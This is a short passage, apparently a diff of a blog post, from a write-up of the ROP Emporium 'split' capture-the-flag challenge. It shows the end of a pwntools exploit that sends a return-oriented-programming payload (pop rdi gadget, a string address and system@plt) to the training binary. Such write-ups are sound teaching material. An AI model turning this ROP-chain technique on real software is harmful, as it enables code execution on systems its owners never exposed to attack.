d3b4g/leonids/_posts/split.md

      payload = offset + pop_rdi + usefullString + system_plt
      p.sendlineafter(">",payload)
      print (p.recvall())

  if __name__ == "__main__":
      main()

    ```

 w00t we got the flag!

 ###### End

-Thats the end of ret2win challenge,it is a very simple one but as i progress through the challenges the exploits will become more complex and fun.
-Remember never stop learning, Cheers!.
+Thats the end of split challenge, we learned how to build a simple ROPChain.
+Cheers!.

 > Code for this challenge  https://github.com/d3b4g/ROP-Emporium